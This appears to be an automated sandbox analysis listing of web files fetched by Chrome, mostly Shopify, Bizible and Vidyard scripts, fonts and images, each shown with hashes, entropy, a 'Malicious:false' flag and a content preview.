                                                                    Preview:import{b}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{b as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as x}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var p=m(x()),g={dsp:"text-dsp",t1:"text-t1",t2:"text-t2",t3:"text-t3",t4:"text-t4",t5:"text-t5",t6:"text-t6",t7:"text-t7",t8:"text-t8",p:"text-body-base","body-base":"text-body-base","body-sm":"text-body-sm","body-lg":"text-body-lg"},i=b("",{variants:{isRichtext:{true:"richtext",false:""},mode:{light:"text-black",dark:"text-white",undefined:""},size:g},defaultVariants:{size:"text-body-base",mode:"undefined"}});function l({as:E,children:t,className:a,componentName:n,isRichtext:e=!0,mode:r,size:s="body-base",...y}){let d=E||"p";return e&&typeof t!="object"?(0,p.jsx)(d,{cla
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:C source, Unicode text, UTF-8 (with BOM) text, with very long lines (573)
                                                                    Category:downloaded
                                                                    Size (bytes):68594
                                                                    Entropy (8bit):5.4800044183319025
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2C78BB1C436BE4259169300AF5354694
                                                                    SHA1:520185C0DA350E54B08920002B32DAED3F626CB2
                                                                    SHA-256:05255377B1E976D4F5CF11BD2A72E3ED0A5B6D8992FF4471DBF4FB5516B61C6D
                                                                    SHA-512:A861C21FD1C108FB7B42E7672C1ACC7E41E2DA82962AA08C43FAA466C393A08E8428351DED76492BA97CEBF8F8FFD1079D3C8889E899A1F4D0F7542ABFE89510
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.bizible.com/scripts/bizible.js
                                                                    Preview:.(function(){var Q={};(function(d){function l(n,m,r){var t=n.length,p,v;m=m||[0];r=r||0;var w=r>>>3;if(0!==t%2)throw Error("String of HEX type must be in byte increments");for(p=0;p<t;p+=2){var x=parseInt(n.substr(p,2),16);if(isNaN(x))throw Error("String of HEX type contains invalid characters");var y=(p>>>1)+w;for(v=y>>>2;m.length<=v;)m.push(0);m[v]|=x<<8*(3-y%4)}return{value:m,binLen:4*t+r}}function b(n,m,r){var t;var p=m||[0];r=r||0;var v=r>>>3;for(t=0;t<n.length;t+=1){m=n.charCodeAt(t);var w=t+.v;var x=w>>>2;p.length<=x&&p.push(0);p[x]|=m<<8*(3-w%4)}return{value:p,binLen:8*n.length+r}}function a(n,m,r){var t=0,p,v;var w=m||[0];r=r||0;m=r>>>3;if(-1===n.search(/^[a-zA-Z0-9=+\/]+$/))throw Error("Invalid character in base-64 string");var x=n.indexOf("=");n=n.replace(/=/g,"");if(-1!==x&&x<n.length)throw Error("Invalid '=' found in base-64 string");for(x=0;x<n.length;x+=4){var y=n.substr(x,4);for(p=v=0;p<y.length;p+=1){var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01234567
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (7444), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):7444
                                                                    Entropy (8bit):5.444931175606478
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:1777BE18ACA739584B7358D19EDE6868
                                                                    SHA1:A899D5CD91E4D1CF032D163F6A2B3664D88DDCB9
                                                                    SHA-256:F63275BBE5E3901096A33FE1CE368DB19C8307A90A732F4144A49C0A33621425
                                                                    SHA-512:821B3711D7DDD6237EBEA9F3C6E9A3C6E0C27AAFDFAFDA62D385BF92352A6C8CA86CCD923764A0C48B44460E2666F740AE89DE0B16F4C65E4C234765AA4FCDAF
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/runtime~main-7d7685dd3a33620d5258ea4224af1389.js
                                                                    Preview:!function(f){function e(e){for(var a,c,d=e[0],n=e[1],r=e[2],t=0,o=[];t<d.length;t++)c=d[t],Object.prototype.hasOwnProperty.call(i,c)&&i[c]&&o.push(i[c][0]),i[c]=0;for(a in n)Object.prototype.hasOwnProperty.call(n,a)&&(f[a]=n[a]);for(p&&p(e);o.length;)o.shift()();return b.push.apply(b,r||[]),s()}function s(){for(var e,a=0;a<b.length;a++){for(var c=b[a],d=!0,n=1;n<c.length;n++){var r=c[n];0!==i[r]&&(d=!1)}d&&(b.splice(a--,1),e=u(u.s=c[0]))}return e}var c={},l={22:0},i={22:0},b=[];function u(e){if(c[e])return c[e].exports;var a=c[e]={i:e,l:!1,exports:{}};return f[e].call(a.exports,a,a.exports,u),a.l=!0,a.exports}u.e=function(b){var e=[];l[b]?e.push(l[b]):0!==l[b]&&{5:1,6:1,9:1,11:1,14:1,18:1,19:1,23:1,24:1,25:1,33:1}[b]&&e.push(l[b]=new Promise(function(e,c){for(var a="stylesheets/"+({0:"vendors~access-code~player~polyfills~unreleased",1:"vendors~access-code~player~unreleased~whitelisted-embed",2:"vendors~access-code~player-pomo~whitelisted-embed",3:"vendors~access-code~player~unreleased"
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):2479
                                                                    Entropy (8bit):4.561752527774179
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:40A70B395AFC3C391953470089E1F58A
                                                                    SHA1:F83BEB89F2D857D8C01866925EBFF995D6946ECF
                                                                    SHA-256:379BB24679711834A7B87B4E70E19D1122FE708EFC3BDBCC90646BCE3B4A4FDE
                                                                    SHA-512:1D485DD4188820DF16066A4AACE94F1C6486DDFE27000DFC1C970B18B03BC1E381EB1DD9A20CD426FCBC9BC1ACA914F45C889F400492A60AD93FB52D4CE4EFFA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="95" height="65" viewBox="0 0 95 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="93" height="63" rx="7.79" fill="white"/>.<path d="M67.1498 34.1665L73.9998 41.2665L67.5332 41.2748L65.3082 38.8748C65.3082 38.8748 63.5748 37.0165 62.5248 35.9165C62.5248 37.7998 62.5248 39.4665 62.5248 41.1998C60.8998 41.1998 59.3998 41.1998 57.8415 41.1998C57.8415 34.0915 57.8415 27.0415 57.8415 19.9165C59.3832 19.9165 60.8832 19.9165 62.4665 19.9165C62.4665 24.1415 62.4665 28.3165 62.4665 32.7915C63.6998 31.5915 67.3248 27.9748 67.3248 27.9748C67.3248 27.9748 72.1998 27.9998 73.7998 27.9998C71.5082 30.1415 67.1498 34.1665 67.1498 34.1665ZM50.0498 27.6915C49.0332 27.5582 47.9665 27.6165 46.9498 27.7832C43.8748 28.3082 41.7832 30.6748 41.5248 33.7832C41.2248 37.3665 42.7748 40.0582 45.8498 41.1415C48.0498 41.9165 50.2832 41.9415 52.4582 41.0498C54.1832 40.3498 55.3915 38.9415 55.8832 37.1082C55.6748 37.1082 51.5082 37.1082 51.5082 37.1082C51.5082 37.1082 51.3165 37.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 36164, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):36164
                                                                    Entropy (8bit):7.993731791575794
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:8225ABE1120788DC2A1DD3B7D31F9946
                                                                    SHA1:41095FCD99AEB32A9174CA328079E8CEE19B726C
                                                                    SHA-256:D51F801F2177BC484384BEA49A545CA6AB741795E17849A9A0B5109C5BB1157F
                                                                    SHA-512:CE2FF3799D6F9464082C1FAB42B0D277B4FFD924999C23D402067FB0CE2FAD56F2E1F86A215B38CC44DA21B59341A9A1D568B05EFB46B4E2BD98E1E7AEF66A55
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/static/fonts/ShopifySans--extrabold.woff2
                                                                    Preview:wOF2.......D............................................`..`..0.....s........^.....6.$..(. ..-..5..$[......-w.....C.VO..........&...n...1.{.......$.1.v......ZV...]. .$.SL..%g.\.p..$.D..Xd.8...... aSw.............Nk.Zju.h..j~...\....T....7.ri....I+....U...S5e..9.E...)...U....~.U....z...2......?.R.$ #<.Bx6.h.x......Gy.O.p. .N....N.r....D.Y....X..v_.....f...x..6...$!......U>.\.2..!.|.LL.7..........ne5P..#9[.<.'>....w....... ..A!....e.....of!F..5..NQ.Z..J..B..<m....%M.>"m,.u.9..E..(.....2P.........X.....V.b.K"..).x.A@.......G_0.......G..F.....4.^.....R.F...........<....K.h ......=..............$+..:)..f.?.[....G......B"T.)Py.s...|...8...A.XZ...M......{..<.a..hf4...,=B....!..T.!..@%.a...:$...Re-C.....X.}...W.@6........6.pv.....}!4.uE.llF0.6..+.QQr.}.......K..k..]....y.....h..m...K+b...s.-..1..$F..T...m.._M.....Uns.(.. .u..s.I...p;@0...5q.O......Vu@@X{.....WhE8....QH......e.lB?....tU..[6....@..8..%".K....}....h...\..a...R<_].[..p....I..&q.X..`{....b0-
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (12697)
                                                                    Category:downloaded
                                                                    Size (bytes):176909
                                                                    Entropy (8bit):5.670539900132179
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:31343D85B6963C3A49261A11A5509DFD
                                                                    SHA1:CCB5C03CC4A5B62E9B4BFEAD92021326FA21FE00
                                                                    SHA-256:DB45014D7E05B90961D5E6B56B7CAF2BCD222F51BF20B118FD65AD921E895DCC
                                                                    SHA-512:A0E4DDA632C9DAE8E5BDA1F0A5699839B4C6FE2B472042324E2272BC66872DB8AA2B4B17823BC41A302364C51C14E5D4B38D484B2AA46A9AF1D68CE58D68691E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/vendors~player~player-pomo~unreleased-ab12c5410a30202855ccd359eb0e7f98.js
                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[4],{1069:./*!*******************************************!*\. !*** ../node_modules/lodash/_baseTrim.js ***!. \*******************************************/./*! no static exports found */./*! all exports used */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(t,n,r){var e=r(/*! ./_trimmedEndIndex */1070),i=/^\s+/;t.exports=function(t){return t&&t.slice(0,e(t)+1).replace(i,"")}},1070:./*!**************************************************!*\. !*** ../node_modules/lodash/_trimmedEndIndex.js ***!. \**************************************************/./*! no static exports found */./*! all exports used */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(t,n){var r=/\s/;t.exports=function(t){for(var n=t.length;n--&&r.test(t.charAt(n)););return n}},1071:./*!********************************************!*\. !*** ../node_modules/lodash/_getRawTag.js ***!. \*************************
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                    Category:downloaded
                                                                    Size (bytes):280
                                                                    Entropy (8bit):7.136687761707186
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:33AA467C205F1BACB8794181377D14C9
                                                                    SHA1:67790E8C95113CA490E68B17DCFB794A496C1E67
                                                                    SHA-256:7A20C9B3B389AFE25A85BBB009FA6A0084088E7EA641A167E2B47E858C5570A9
                                                                    SHA-512:E3C49862716B45DA512A90D0758BAABAE8014684947CBCF37885EFD3601D3A32B86982154EACEEBB67BFCAA46038E566931A2CD7B24177F61EDB8B8A5A726A92
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://my.visme.co/static/images/favicon.png
                                                                    Preview:RIFF....WEBPVP8L..../.......m.'.{^.....H6.......F..D.7...@..*#.T..OUPb.....g....N.(..$).....;...i......G..Qx......W.b...H...JV..e.d...r#.........L..6..!ej....4.)..U/..F.)b.y.<9..ft......m.../.,rP.N.Ar.]..#..AFl..+....kS.;....$...9,.:..*.Ar..p]_............U.R.z.z.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):5838
                                                                    Entropy (8bit):4.350528792996475
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D7C2832FEE460B4E7B90D2620F0149E6
                                                                    SHA1:C38BACB1226458E5DA6D13BBA289BDF4073C252F
                                                                    SHA-256:4126A0F30E4BC50323CC9F37CB0267529CC73BF5C68D562239E43A477F52E584
                                                                    SHA-512:CA16E8F14A2D30B7C01AE812EBDF5650464A7A9F8D3A4628DFD7D12C9402C2FC27287AAAF7DB1A2D7099652509EED2C7914EDA142FDB3E48218F6D66FC95A35B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/d7c2832fee460b4e7b90d2620f0149e6.svgz
                                                                    Preview:<svg width="153" height="63" viewBox="0 0 153 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="152" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1549_7012)"/>.<g clip-path="url(#clip0_1549_7012)">.<path d="M117.068 21.4736H36.8994V44.3859H117.068V21.4736Z" fill="black"/>.<path d="M107.939 39.1577V35.9297C108.074 35.9998 108.276 35.9998 108.411 35.9998C108.815 35.9998 109.287 35.9297 109.826 35.7893C110.432 35.649 111.038 35.5086 111.779 35.2279L112.52 38.1051C111.712 38.456 110.836 38.7367 110.028 38.877C109.354 39.0174 108.68 39.0876 107.939 39.1577ZM107.939 34.4209V32.3858H109.758C109.691 31.7542 109.489 31.263 109.219 30.9823C108.882 30.6314 108.478 30.4911 107.939 30.4911V28.0349C109.556 28.1051 110.836 28.6665 111.779 29.7191C112.79 30.8419 113.329 32.3858 113.329 34.3507V34.4209H107.939ZM107.939 28.0349V30.4911C107.4 30.4911 106.996 30.6314 106.659 30.9823C106.39 31.3332 106.188 31.7542 106.188 32.3156L107.939 32.3858V34.4209H10
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1042)
                                                                    Category:downloaded
                                                                    Size (bytes):1043
                                                                    Entropy (8bit):5.392530923364544
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EF2F1D7EB69F510A86BC4FAF38D926C8
                                                                    SHA1:81CFD3FC4691781B7D6C8EE3E607687BDFF5E243
                                                                    SHA-256:8CE232EE22FE92D306BB820C32F5ECFC18BF5A57665E22CF7CCD0A461A7AB1DD
                                                                    SHA-512:82314ED43765E21FF620FC38DB137829E86ACBCB3F3AED40D1B1FA00AFEF71F5E72250ED9927A2B1E23E36688A8D991BEB7956292B29C4F163C125C333E5230D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5LSG7SHH.js
                                                                    Preview:import{b as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var d=r(s());function u({children:a=null,className:m,span:t={xs:4,sm:8,md:12},start:c=1,center:g=!1,...C}){let f={xs:4,sm:8,md:12,lg:12,xl:12},i=(o,e)=>typeof e=="object"?Object.entries(e).map(([n,y])=>`${n}:col-${o}-${y}`).join(" "):`col-${o}-${e}`,b=g?(o=>Object.entries(o).map(([e,n])=>n!==void 0?`${e}:col-start-${Math.floor((f[e]-n)/2)+1}`:"").join(" "))(t):i("start",c),x=i("span",t);return(0,d.jsx)("div",{className:l("col-span-4",[x,b],m),...C,children:a})}var p=r(s());function N({children:a,componentName:m,className:t,...c}){return(0,p.jsx)("div",{className:l("container grid grid-cols-4 sm:grid-cols-8 md:grid-cols-12 gap-x-gutter gap-y-2xl",t),"data-component-name":
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (2073)
                                                                    Category:downloaded
                                                                    Size (bytes):2074
                                                                    Entropy (8bit):5.257137317331061
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E1CE318B7DDA39CB97F7C53FD3E01670
                                                                    SHA1:F3F55DAA06E26C0B95C0F56D4D83688C1119BF26
                                                                    SHA-256:D749939DD56D8CDA182352F24EE165FE57C466EACA164A058F55BEF7BDF2F481
                                                                    SHA-512:81542D093E1399B38B1B9F913371174E31B87103C27E82EA75CFBFBCA00A471F8C92F5F9E3F6333055C3BCEDAA5E9039350C4AAEAF8E1C62A18610204B03F68A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-L3M65SDF.js
                                                                    Preview:import{b as f}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-OZUJT76U.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-DFKXNKV3.js";import{b as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{b as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as g}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as B}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var a=s(B());var e=s(g()),I=i("",{variants:{visualPosition:{left:"",right:""},verticalAlign:{top:"",center:""}},compoundVariants:[{visualPosition:"right",className:"sm:col-span-6"},{visualPosition:"right",verticalAlign:"center",className:"place-conten
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (403)
                                                                    Category:downloaded
                                                                    Size (bytes):404
                                                                    Entropy (8bit):5.219722996655413
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4CA0E9EB8B2667BD2B08B1965151CDA2
                                                                    SHA1:A2C8BECE43090C543CAC3487127D4BC4A4B17332
                                                                    SHA-256:A5C4056CF3D4E756765DDCD5BCFF7270F1905B01176B01A4A7DEA00F8BD25A6C
                                                                    SHA-512:318AF3A6711D374070C8A40714138530263B3D4C0624DF889B4CB7AE93479DE4CBC402D35A6740F81C8A97799D218CA48BAC774A63C273C00993A3DCE675B95A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-MOSJSY7P.js
                                                                    Preview:import{a as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var r=s(d()),i=(e,t)=>{(0,r.useEffect)(()=>{let n=o=>{o.key===e&&t(o)};return document.addEventListener("keydown",n),()=>{document.removeEventListener("keydown",n)}},[e,t])};export{i as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (521)
                                                                    Category:downloaded
                                                                    Size (bytes):522
                                                                    Entropy (8bit):5.430216782327303
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:98074B099EB3021B14E51C0110170CC4
                                                                    SHA1:C9BE04CF85A2B5C1E40CA188F378956D51E804C3
                                                                    SHA-256:19F15BD8C6873DF60035EADA367CCBC0FC392F7D2C057B162145ADA3546CBCA0
                                                                    SHA-512:69CE7F445971D6A4695FAE29694DC3C77D5C25607D8A9A8D9CB9AF6FBBFC84B79835469C39CB0378AE6B172AED048120A1D1487D1931A55F24153AC5E73CAE22
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-73E4MQIO.js
                                                                    Preview:import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=e(r()),l=a=>(0,t.jsx)("svg",{viewBox:"0 0 20 20","aria-hidden":"true",focusable:"false",...a,children:(0,t.jsx)("path",{d:"M17.707 9.293l-5-5a.999.999 0 10-1.414 1.414L14.586 9H3a1 1 0 100 2h11.586l-3.293 3.293a.999.999 0 101.414 1.414l5-5a.999.999 0 000-1.414z",fill:"currentColor"})}),o=l;export{o as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):188
                                                                    Entropy (8bit):4.856532112814005
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:55ACAAD6FF5D2FC541C00652D0378C80
                                                                    SHA1:FFE0562354FEC56C628E91C1FC1AD4FD77ACCE56
                                                                    SHA-256:C4F9F7BA1118217ED5A1D1A2CC0059BD2C973DF14E6A5A045B211BB0D3FFF220
                                                                    SHA-512:F64E5B6375E4FDD5B8AC3CD834498A0DD2F21BC611E770B681953BCBE5317EF5886000FB9F93D6BF70238406F7907D56B25C9E938DD85E9A030FEA67AB9397DD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-CBAOJPQ6.js
                                                                    Preview:function l(n,r=1){let t=[];for(let e=1;e<=r;e++)t.push(n);return t.flat()}var o=n=>r=>l(r,n),u=o(3),c=o(4),a=n=>{let r=n.length;return r<10?c(n):r>=10&&r<20?u(n):n};export{l as a,a as b};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (473)
                                                                    Category:downloaded
                                                                    Size (bytes):474
                                                                    Entropy (8bit):5.416278941933954
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:FCB25B3F3143AB9E3459CFBA57532A02
                                                                    SHA1:D10D51DA4FCC060CD357270D7DB3347941A2074D
                                                                    SHA-256:BB25B3A7C8C26F6EF53481E266F241FE11476DB92A65A6166EEE985C5CC9B20E
                                                                    SHA-512:F90A9A8907E624BC44F2932330843A07037F896F1DDB78195DB0B298712C2A1FA685B746D356F53845610882EEBD554054611495C000E600B765FF508E5150BD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-DLSA5SME.js
                                                                    Preview:import{a as e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=r(e()),l=o=>(0,t.jsx)("svg",{viewBox:"0 0 20 20",...o,children:(0,t.jsx)("path",{d:"m17.707 9.293-5-5a1 1 0 0 0-1.414 1.414L14.586 9H3a1 1 0 1 0 0 2h11.586l-3.293 3.293a1 1 0 0 0 1.414 1.414l5-5a1 1 0 0 0 0-1.414z",fill:"currentColor"})}),a=l;export{a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (975)
                                                                    Category:downloaded
                                                                    Size (bytes):976
                                                                    Entropy (8bit):5.236096076400467
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2B3FC578C5BF0DE2F86F3D823D43ADF2
                                                                    SHA1:CCC6801823C4FB2FFA1C1C6E95AA6823D160046B
                                                                    SHA-256:C29650E1C8F87195FFB9F453564BB394D9DFB37917C4AD4922E34B8791F33AB6
                                                                    SHA-512:C1F9C6EB1B263C2D21519674271A5956F5BD1821BE568481AA326789A0DEFA7B85D0983142DBCDC833D75A7A594E9CA92DD3E9CCD870DBCA0B984FED6DEEFD8B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-IRTLQQH2.js
                                                                    Preview:import{b as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{b as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=r(e()),g=t("grid grid-cols-1 gap-x-gutter",{variants:{extraVerticalSpacing:{true:"gap-y-xl",false:"gap-y-gutter"},numberOfColumns:{1:"",2:"sm:grid-cols-2",3:"sm:grid-cols-2 lg:grid-cols-3",4:"sm:grid-cols-2 lg:grid-cols-4"},withContainer:{true:"container",false:""}}});function m({children:i,className:n,extraVerticalSpacing:s=!1,numberOfColumns:l=4,withContainer:c=!1}){let d="card-grid";return(0,o.jsx)("div",{className:a(g({extraVerticalSpacing:s,numberOfColumns:l,withContainer:c}),n),"data-component-name":d,children:i})}export{m as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1917)
                                                                    Category:downloaded
                                                                    Size (bytes):1918
                                                                    Entropy (8bit):5.375715575664843
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:95F85B5EF3372525909671B0103C2CD6
                                                                    SHA1:6292461F4F18FC3CF33E9963B07CA86E1EAD05BF
                                                                    SHA-256:D99AC972621A2638CA283824967111DA594324091C8B5606DC02DFDD95B21497
                                                                    SHA-512:65B1400E6358B93B1D22AE86B256E076DE6D1D6AF3F1021EEFF1BB373E11D3ED1A3F748A59AC99258048421747BD960C97957EA7213A4A7419132FB03C8131BE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-OTRC2TBF.js
                                                                    Preview:import{f as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TJ5CAOJ6.js";import{b as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as P}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as C}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var g=l(r()),y=(e=>(e.One="col-span-1",e.Two="col-span-2",e.Three="col-span-3",e.Four="col-span-4",e.Five="col-span-5",e.Six="col-span-6",e.Seven="col-span-7",e.Eight="col-span-8",e.Nine="col-span-9",e.Ten="col-span-10",e.Eleven="col-span-11",e.Twelve="col-span-12",e))(y||{}),E=(e=>(e.One="col-start-1",e.Two="col-start-2",e.Three="col-start-3",e.Four="col-
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (469)
                                                                    Category:downloaded
                                                                    Size (bytes):470
                                                                    Entropy (8bit):5.209439088705145
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:5CAC3162B8597EAC892FA0A537C66F2A
                                                                    SHA1:72E0476A949F8E7767D755C5AFB82CC3E8AF4AA9
                                                                    SHA-256:4E8BF5C997E681E92C5817D50D6A909C99536E30B45250858A4BC3CD0F46BF92
                                                                    SHA-512:35BDE07BE993253BFA7FB933BC388CEB5A91D753CF4B5C3A6DD003844D2CE6F6D551A0D537A64C1A0C85C075AD40E28218FFD5FCF883AE69B5D547F49A3D9A2C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-MIDNVE63.js
                                                                    Preview:import{a as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=r(s());function h(o){let[n,e]=(0,t.useState)("");return(0,t.useEffect)(()=>{let a=()=>{e(location.hash||"")};return window?.addEventListener("popstate",a),e(location.hash||""),()=>{window?.removeEventListener?.("popstate",a)}},[o]),n}export{h as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                    Category:downloaded
                                                                    Size (bytes):198926
                                                                    Entropy (8bit):7.998635616339134
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:69A191189098D05CE73ED42A2B17A29C
                                                                    SHA1:06B2CDB4424AC57DE4CFF9D730F4241E75CE2CD2
                                                                    SHA-256:AEB33480199F143A39BF011AE24CDEC8AABAFDFCAC41DCB0457D9D2B4974A978
                                                                    SHA-512:964954F7EC7E7B2816326211DC1D71E48C680F53CE2174755E4631C8AA69E497B85D830A515EEC9026F15766A7A26D04A5837D8C598B4094FFB92D8CB999FB0D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/339113bc828c2c7ab760a434e1703b93.webp?originalWidth=3840&originalHeight=2160&width=1920&height=1080
